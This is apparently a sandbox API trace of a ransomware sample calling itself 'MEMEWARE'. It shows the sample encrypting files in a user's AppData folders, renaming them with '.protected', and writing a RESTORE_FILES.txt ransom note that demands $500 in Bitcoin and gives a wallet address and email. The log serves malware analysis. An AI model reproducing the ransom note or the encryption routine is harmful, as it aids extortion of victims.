[0078.078] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Windows") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files (x86)") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="$Recycle.bin") returned 1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="System Volume Information") returned -1 [0078.078] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrIW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".protected") returned 0x0 [0078.078] lstrcmpW (lpString1="GoogleUpdateSetup.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.078] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".rar") returned 0x0 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".zip") returned 0x0 [0078.078] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.096] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.096] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.113] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.113] CloseHandle (hObject=0x158) returned 1 [0078.113] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.protected") returned 174 [0078.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.protected")) returned 1 [0078.113] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.113] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.113] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\RESTORE_FILES.txt") returned 160 [0078.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.125] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.125] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.126] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.126] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.126] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.126] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.126] CloseHandle (hObject=0x154) returned 1 [0078.127] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Windows") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files (x86)") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="$Recycle.bin") returned 1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="System Volume Information") returned -1 [0078.127] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned 137 [0078.127] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2=".") returned 1 [0078.127] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="..") returned 1 [0078.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*") returned 139 [0078.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\.") returned 139 [0078.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.129] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\..") returned 140 [0078.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.129] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Windows") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Program Files") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Program Files (x86)") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="$Recycle.bin") returned 1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="System Volume Information") returned -1 [0078.130] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.130] StrStrIW (lpFirst="clickonce_bootstrap.exe", lpSrch=".protected") returned 0x0 [0078.130] lstrcmpW (lpString1="clickonce_bootstrap.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".txt") returned 0x0 [0078.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".rar") returned 0x0 [0078.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".zip") returned 0x0 [0078.131] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.147] CloseHandle (hObject=0x158) returned 1 [0078.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected") returned 171 [0078.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected")) returned 1 [0078.147] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Windows") returned -1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Program Files") returned -1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="System Volume Information") returned -1 [0078.147] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrIW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".protected") returned 0x0 [0078.148] lstrcmpW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".txt") returned 0x0 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".rar") returned 0x0 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".zip") returned 0x0 [0078.148] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.152] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.152] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.153] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.153] CloseHandle (hObject=0x158) returned 1 [0078.153] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected") returned 178 [0078.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected")) returned 1 [0078.154] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Windows") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Program Files") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Program Files (x86)") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="$Recycle.bin") returned 1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", 